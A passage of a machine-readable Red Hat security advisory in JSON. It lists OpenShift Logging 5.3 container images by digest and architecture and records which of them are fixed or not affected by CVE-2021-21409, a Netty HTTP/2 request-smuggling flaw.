"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x as a component of OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x"
},
"product_reference": "openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64 as a component of OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64"
},
"product_reference": "openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64 as a component of OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64"
},
"product_reference": "openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x as a component of OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x"
},
"product_reference": "openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64 as a component of OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64"
},
"product_reference": "openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le as a component of OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le"
},
"product_reference": "openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le as a component of OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le"
},
"product_reference": "openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64 as a component of OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64"
},
"product_reference": "openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x as a component of OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x"
},
"product_reference": "openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64 as a component of OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64"
},
"product_reference": "openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x as a component of OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x"
},
"product_reference": "openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le as a component of OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le"
},
"product_reference": "openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x as a component of OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x"
},
"product_reference": "openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64 as a component of OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64"
},
"product_reference": "openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le as a component of OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le"
},
"product_reference": "openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le as a component of OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le"
},
"product_reference": "openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x as a component of OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x"
},
"product_reference": "openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64 as a component of OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64"
},
"product_reference": "openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x as a component of OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x"
},
"product_reference": "openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le as a component of OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le"
},
"product_reference": "openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64 as a component of OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64"
},
"product_reference": "openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le as a component of OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le"
},
"product_reference": "openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x as a component of OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x"
},
"product_reference": "openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64 as a component of OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64"
},
"product_reference": "openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le as a component of OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le"
},
"product_reference": "openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64 as a component of OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64"
},
"product_reference": "openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x as a component of OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x"
},
"product_reference": "openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.3"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-21409",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2021-03-30T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1944888"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty. There is an issue where the content-length header is not validated correctly if the request uses a single Http2HeaderFrame with the endstream set to true. This flaw leads to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. The highest threat from this vulnerability is to integrity.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty: Request smuggling via content-length header",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Satellite ships a vulnerable Netty version embedded in Candlepin. However, it is not directly vulnerable since the HTTP requests are handled by Tomcat and not by Netty.\nRed Hat OpenStack Platform\u0027s OpenDaylight will not be updated for this flaw because it was deprecated as of OpenStack Platform 14 and is only receiving security fixes for Important and Critical flaws.\n\nIn OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack, ship the vulnerable version of netty-codec-http package.\nSince the release of OCP 4.6, the Metering product has been deprecated [1], hence the affected components are marked as wontfix.\nThis may be fixed in the future.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le"
],
"known_not_affected": [
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-21409"
},
{
"category": "external",
"summary": "RHBZ#1944888",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1944888"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-21409",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21409"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21409",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21409"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-f256-j965-7f32",
"url": "https://github.com/netty/netty/security/advisories/GHSA-f256-j965-7f32"
}
],
"release_date": "2021-03-30T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T19:37:00+00:00",
